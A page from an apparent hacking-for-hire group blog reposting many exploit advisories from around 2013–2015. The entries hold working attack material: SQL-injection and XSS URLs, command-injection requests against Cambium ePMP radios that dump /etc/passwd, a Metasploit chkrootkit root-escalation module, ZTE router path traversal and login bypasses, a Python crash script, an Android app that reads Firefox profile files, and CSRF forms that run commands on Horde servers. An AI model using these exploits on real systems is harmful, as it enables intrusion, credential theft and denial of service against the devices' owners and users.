Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863164652

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/62610/info

The JVideoClip component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

JVideoClip 1.5.1 is vulnerable; other versions may also be affected. 

http://www.example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
HireHackking 
*July 14, 2015: *First contacted Cambium

*July 14, 2015: *Initial vendor response

*July 16, 2015: *Vuln Details reported to Cambium

*July 31, 2015:* Followup on advisory and fix timelines

*August 03, 2015: *Vendor gives mid-Aug as fix (v2.5) release
timeline. Ceases communication.

*Nov 19, 2015: *Releasing vulnerability details & poc


*Versions affected*: < v2.5


.....

*CVE-IDs* - To be assigned.

.....


*Background *

http://www.cambiumnetworks.com/products/access/epmp-1000/



ePMP 1000
Wireless service providers and enterprises need reliable, high-quality
broadband connectivity that can be rapidly deployed and expanded. The
ePMP platform provides stable coverage across large service areas and
enhances your existing infrastructure.


*Deployed by:*


ION Telecom
Kayse Wireless
Vanilla Telecom
Traeger Park
EszakNet
Edera
Videon
COMeSER
Seattle, WA
Budapest Video Surveillance
Desktop
Silo Wireless
Rocket Broadband
Snavely Forest Products
KRK Sistemi
KAJA Komputer
Root Media


*Vulnerability Details*

*From Cambium Networks ePMP 1000 user / configuration guide:
*
ePMP 1000 has four (4) users -

- ADMINISTRATOR, who has full read and write permissions.
- INSTALLER, who has permissions to read and write parameters
applicable to unit installation and monitoring.
- HOME, who has permissions only to access pertinent information for
support purposes
- READONLY, who only has permissions to view the Monitor page.


.....

1. *OS Command Injection *

'admin' and 'installer' users have access to perform Ping and
Traceroute functions via GUI. No other user has this access.

Ping function accepts destination IP address value via 'ping_ip
parameter and uses three (3) other parameters - packets_num, buf_size
and ttl, to perform Ping.

Traceroute function accepts destination IP address via 'traceroute_ip'
parameter.

The application does not perform strict input validation for all these
parameters - ping_ip', packets_num, buf_size and ttl for Ping
function; and traceroute_ip for Traceroute function.

This allows an authenticated user - 'admin' or non-admin,
low-privileged 'installer' & ‘home’ users - to be able to inject
arbitrary system commands that gets executed by the host.

.....
*PING PoC *

.....
HTTP Request
.....

POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0

[
*or*

ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0
*or*

ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0
*or*

ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0
]


.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash


.....
*traceroute - PoC
*
.....
HTTP Request
.....

POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Installer; usernameType=installer; stok=<stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0

.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 16:09:26 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash


.....

2. *Weak Authorization Controls + privilege escalation*

'home' and 'readonly' users do not have access to Ping and Traceroute
functions via management portal. However, the application lacks strict
authorization controls, and we can still perform both these functions
by sending corresponding HTTP(S) requests directly, when logged in as
low-privileged, 'home' user.

When we combine this flaw with above described OS Command Injection
affecting ping and traceroute, it is possible for non-admin,
low-privileged, ‘home’ user to execute system level commands via
'ping' and 'traceroute' functions and dump password hashes easily and
/ or perform any system level functions.
*Note*: ‘readonly’ user cannot perform this. Only ‘home’ user can
exploit these.

.....
*Steps to attack -
*
a login as home user
b craft & send HTTP request for ping and traceroute functions

.....
Login - HTTP Request
..

POST /cgi-bin/luci HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

username=home&password=<password>


.....
Login - HTTP Response
..


HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Set-Cookie: sysauth=<home-sysauth_value>;
path=/cgi-bin/luci/;stok=<home-stok-value>
Content-Type: application/json
Expires: 0
Date: Sun, 18 Jan 1970 16:40:50 GMT
Server: Cambium HTTP Server

{ "stok": <home-stok_value>", "certif_dir": "/tmp/new_certificates/",
"status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status }


..
*Sending HTTP request for Ping function
*
.....
HTTP Request
.....

POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<home-sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Home User; usernameType=home; stok=<home-stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0

.....
HTTP Response
.....

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server

daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash

..

Similarly, Traceroute function can be exploited.

......................................................................................................................................................

3. *Weak Authorization Controls + Information Disclosure*

In addition to 'admin', only 'installer' user has the option to access
device configuration. ‘home’ user does not have GUI option and should
not be able to access / download device configuration. However, the
application lacks strict authorization measures and the low-privileged
'home' user can gain unauthorized access to the device configuration
simply by requesting it.
*Configuration backup export* can be performed by directly accessing
the following url:
*http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json
*
Upon a successful config export, full device configuration with
clear-text passwords, usernames, keys, IP addresses, statistics, logs
etc is downloaded.

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: application/json
Content-Disposition: attachment; filename=<filename>.json
Expires: 0
Date: Sun, 18 Jan 1970 16:50:21 GMT
Server: Cambium HTTP Server

{
"template_props":
{
"templateName":"",
"templateDescription":"",
"device_type":"",

…
<output - snipped>
…
}

.....


Best Regards,

Karn Ganeshen

-- 
Best Regards,
Karn Ganeshen
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class Metasploit4 < Msf::Exploit::Local

  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chkrootkit Local Privilege Escalation',
      'Description'    => %q{
        Chkrootkit before 0.50 will run any executable file named
        /tmp/update as root, allowing a trivial privsec.

        WfsDelay is set to 24h, since this is how often a chkrootkit
        scan is scheduled by default.
      },
      'Author'         => [
        'Thomas Stangner',        # Original exploit
        'Julien "jvoisin" Voisin' # Metasploit module
      ],
      'References'     => [
        ['CVE', '2014-0476'],
        ['OSVDB', '107710'],
        ['EDB', '33899'],
        ['BID', '67813'],
        ['CWE', '20'],
        ['URL', 'http://seclists.org/oss-sec/2014/q2/430']
      ],
      'DisclosureDate' => 'Jun 04 2014',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Privileged'     => true,
      'Stance'         => Msf::Exploit::Stance::Passive,
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
    ))

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')

    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')

    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end

end
HireHackking 
# Exploit Title: [ZTE ZXHN H108N R1A + ZXV10 W300 routers - multiple
vulnerabilities]
# Discovered by: Karn Ganeshen
# CERT VU# 391604
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported
# ZTE ZXHN H108N R1A - Software version ZTE.bhs.ZXHNH108NR1A
# ZTE ZXV10 W300 - Software version - w300v1.0.0f_ER1_PE

Overview
ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10
W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities.
*CVE-ID*:
CVE-2015-7248
CVE-2015-7249
CVE-2015-7250
CVE-2015-7251
CVE-2015-7252

*Note*: Large deployment size, primarily in Peru, used by TdP.

Description
*CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information
Exposure* - CVE-2015-7248
Multiple information exposure vulnerabilities enable an attacker to obtain
credentials and other sensitive details about the ZXHN H108N R1A.
A. User names and password hashes can be viewed in the page source of
http://<IP>/cgi-bin/webproc

PoC:

Login Page source contents:

...snip....
//get user info
var G_UserInfo = new Array();
var m = 0;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "admin"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here
G_UserInfo[m][2] = "1"; //Level
G_UserInfo[m][3] = "1"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "user"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "2"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "support"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "3"; //Index
m++;
...snip...

B. The configuration file of the device contains usernames, passwords,
keys, and other values in plain text, which can be used by a user with
lower privileges to gain admin account access. This issue also affects ZTE
ZXV10 W300 models, version W300V1.0.0f_ER1_PE.


*CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper
Authorization* - CVE-2015-7249

By default, only admin may authenticate directly with the web
administration pages in the ZXHN H108N R1A. By manipulating parameters in
client-side requests, an attacker may authenticate as another existing
account, such as user or support, and may be able to perform actions
otherwise not allowed.

PoC 1:
1. Login page user drop-down option shows only admin only.
2. Use an intercepting proxy / Tamper Data - and intercept the Login submit
request.
3. Change the username admin to user / support and continue Login.
4. Application permits other users to log in to mgmt portal.

PoC 2:
After logging in as support, some functional options are visibly
restricted. Certain actions can still be performed by calling the url
directly. Application does not perform proper AuthZ checks.

Following poc is a change password link. It is accessible directly, though
it (correctly) is restricted to changing normal user (non-admin) password
only.

http://
<IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd

Other functions / pages may also be accessible to non-privileged users.


*CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper
Limitation of a Pathname to a Restricted Directory ('Path Traversal') *-
CVE-2015-7250

The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter
which takes an unrestricted file path as input, allowing an attacker to
read arbitrary files on the system.

Arbitrary files can be read off of the device. No authentication is
required to exploit this vulnerability.

PoC

HTTP POST request

POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177

getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj­
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a


HTTP Response

HTTP/1.0 200 OK
Content­type: text/html
Pragma: no­cache
Cache­Control: no­cache
set­cookie: sessionid=7ce7bd4a; expires=Fri, 31­Dec­9999 23:59:59
GMT;path=/

#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh


*CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of
Hard-coded Credentials* - CVE-2015-7251

In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible
using the hard-coded credentials 'root' for both the username and password.

*CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper
Neutralization of Input During Web Page Generation ('Cross-site
Scripting') *- CVE-2015-7252

In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is
vulnerable to reflected cross-site scripting [pre-authentication].

PoC

POST /cgi­bin/webproc HTTP/1.1
Host: IP
User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept­Language: en­US,en;q=0.5
Accept­Encoding: gzip, deflate
Referer: https://IP/cgi­bin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keep­alive
Content­Type: application/x­www­form­urlencoded
Content­Length: 177

getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj­
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a



+++++
-- 
Best Regards,
Karn Ganeshen
HireHackking 
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]

*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259

*Note*: Large deployment size, primarily in Peru, used by TdP.

1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.

*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.

*Vulnerability:*
Any non-admin user can change 'admin' password.

*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter ­ username ­ change from 'support' to
'admin'
e. Enter the new password ­> old password is not requested ­> Submit
> Login as admin
-> Pwn!


2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear­-text.

*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: <­­­ admin/XXX1

$sh
ADSL#login show                 <--­­­ shows user information
Username Password Priority
admin        password1 2
support      password2 0
admin         password3 1

3 *(Potential) Backdoor account feature - **insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.

It is considered as a (redundant) login support *feature*.

*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <­--­­ admin/password3

$sh
ADSL#login show
Username  Password  Priority
admin  password1  2
support  password2  0
admin  password3  1

+++++
-- 
Best Regards,
Karn Ganeshen
HireHackking 
source: https://www.securityfocus.com/bid/62586/info

ShareKM is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to cause the server to crash or disconnect, denying service to legitimate users.

ShareKM 1.0.19 is vulnerable; prior versions may also be affected. 

#!/usr/bin/python
import socket
 
TCP_IP = '192.168.1.100'
TCP_PORT = 55554
BUFFER_SIZE = 1024
MESSAGE = "\x41" * 50000
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(MESSAGE)
s.close()
HireHackking 
source: https://www.securityfocus.com/bid/62581/info

MentalJS is prone to a security-bypass vulnerability.

An attacker can exploit this issue to bypass sandbox security restrictions and perform unauthorized actions; this may aid in launching further attacks. 

http://www.example.com/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/62572/info

Monstra CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Monstra 1.2.0 is vulnerable; other versions may also be affected.

POST /admin/ HTTP/1.1
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=f6bd4782f77e4027d3975d32c414a36d
Host: XXX
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
login=-1' or 85 = '83&login_submit=Enter&password=lincoln.dll
HireHackking 
source: https://www.securityfocus.com/bid/62513/info

The RokMicroNews plugin for WordPress is prone to multiple security vulnerabilities, including:

1. An information-disclosure vulnerability
2. A cross-site scripting vulnerability
3. An arbitrary file-upload vulnerability
4. A denial-of-service vulnerability

Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://

http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example1.com/big_file&h=1&w=1

http://www.example.com/wp-content/plugins/wp_rokmicronews/thumb.php?src=http://www.example2.com/shell.php
HireHackking 
source: https://www.securityfocus.com/bid/62493/info

The RokIntroScroller plugin for WordPress is prone to multiple security vulnerabilities, including:

1. An arbitrary file-upload vulnerability
2. A cross-site scripting vulnerability
3. An information-disclosure vulnerability
4. A denial-of-service vulnerability

Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

RokIntroScroller 1.8 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/page.png&h=1&w=1111111

http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/big_file&h=1&w=1

http://www.example.com/wp-content/plugins/wp_rokintroscroller/thumb.php?src=http://www.example2.com/shell.php

http://www.example.com/wp-content/plugins/wp_rokintroscroller/rokintroscroller.php
HireHackking 
source: https://www.securityfocus.com/bid/62480/info

Mozilla Firefox is prone to a security-bypass vulnerability.

Attackers can exploit this issue to bypass the same-origin policy and certain access restrictions to access data, or execute arbitrary script code in the browser of an unsuspecting user in the context of another site. This could be used to steal sensitive information or launch other attacks.

Note: This issue was previously discussed in BID 62447 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2013-76 through -92 Multiple Vulnerabilities), but has been moved to its own record to better document it.

This issue is fixed in Firefox 24.0. 

ckage jp.mbsd.terada.attackfirefox1;

  import android.net.Uri;
  import android.os.Bundle;
  import android.app.Activity;
  import android.content.Intent;

  public class MainActivity extends Activity {
      public final static String MY_PKG =
          "jp.mbsd.terada.attackfirefox1";

      public final static String MY_TMP_DIR =
          "/data/data/" + MY_PKG + "/tmp/";

      public final static String HTML_PATH =
          MY_TMP_DIR + "A" + Math.random() + ".html";

      public final static String TARGET_PKG =
          "org.mozilla.firefox";

      public final static String TARGET_FILE_PATH =
          "/data/data/" + TARGET_PKG + "/files/mozilla/profiles.ini";

      public final static String HTML =
          "<u>Wait a few seconds.</u>" +
          "<script>" +
          "function doit() {" +
          "    var xhr = new XMLHttpRequest;" +
          "    xhr.onload = function() {" +
          "        alert(xhr.responseText);" +
          "    };" +
          "    xhr.open('GET', document.URL);" +
          "    xhr.send(null);" +
          "}" +
          "setTimeout(doit, 8000);" +
          "</script>";

      @Override
      public void onCreate(Bundle savedInstanceState) {
          super.onCreate(savedInstanceState);
          setContentView(R.layout.activity_main);
          doit();
      }

      public void doit() {
          try {
              // create a malicious HTML
              cmdexec("mkdir " + MY_TMP_DIR);
              cmdexec("echo \"" + HTML + "\" > " + HTML_PATH);
              cmdexec("chmod -R 777 " + MY_TMP_DIR);

              Thread.sleep(1000);

              // force Firefox to load the malicious HTML
              invokeFirefox("file://" + HTML_PATH);

              Thread.sleep(4000);

              // replace the HTML with a symbolic link to profiles.ini
              cmdexec("rm " + HTML_PATH);
              cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH);
          }
          catch (Exception e) {}
      }

      public void invokeFirefox(String url) {
          Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url));
          intent.setClassName(TARGET_PKG, TARGET_PKG + ".App");
          startActivity(intent);
      }

      public void cmdexec(String cmd) {
          try {
              String[] tmp = new String[] {"/system/bin/sh", "-c", cmd};
              Runtime.getRuntime().exec(tmp);
          }
          catch (Exception e) {}
      }
  }
HireHackking 
Advisory ID: HTB23272
Product: Horde Groupware 
Vendor: http://www.horde.org
Vulnerable Version(s): 5.2.10  and probably prior
Tested Version: 5.2.10 
Advisory Publication:  September 30, 2015  [without technical details]
Vendor Notification: September 30, 2015 
Vendor Patch: October 22, 2015 
Public Disclosure: November 18, 2015 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-7984
Risk Level: High 
CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration suite Horde Groupware, used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information, stored in database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and company’s infrastructure. 


1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984

1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary system commands on the server.

CSRF exploit below sends HTTP POST request to vulnerable script and instructs it to display output of "/bin/ls" command. As a result, you will see contents of "/admin/" directory:


<form action="http://[host]/admin/cmdshell.php" method="post" name="main">
<input type="hidden" name="cmd" value="ls">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>


1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary SQL queries with application’s database.

The exploit code below executes "SELECT version()" query and displays version of current MySQL server: 


<form action="http://[host]/admin/sqlshell.php" method="post" name="main">
<input type="hidden" name="sql" value="SELECT version()">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>


1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary php code on the server.

The exploit code below executes the "phpinfo()" function and displays its output:


<form action="http://[host]/admin/phpshell.php" method="post" name="main">
<input type="hidden" name="app" value="horde">
<input type="hidden" name="php" value="phpinfo();">
<input value="submit" id="btn" type="submit" />
</form>
<script>
document.getElementById('btn').click();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Update to Horde Groupware 5.2.11

More Information:
http://lists.horde.org/archives/announce/2015/001137.html

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware.
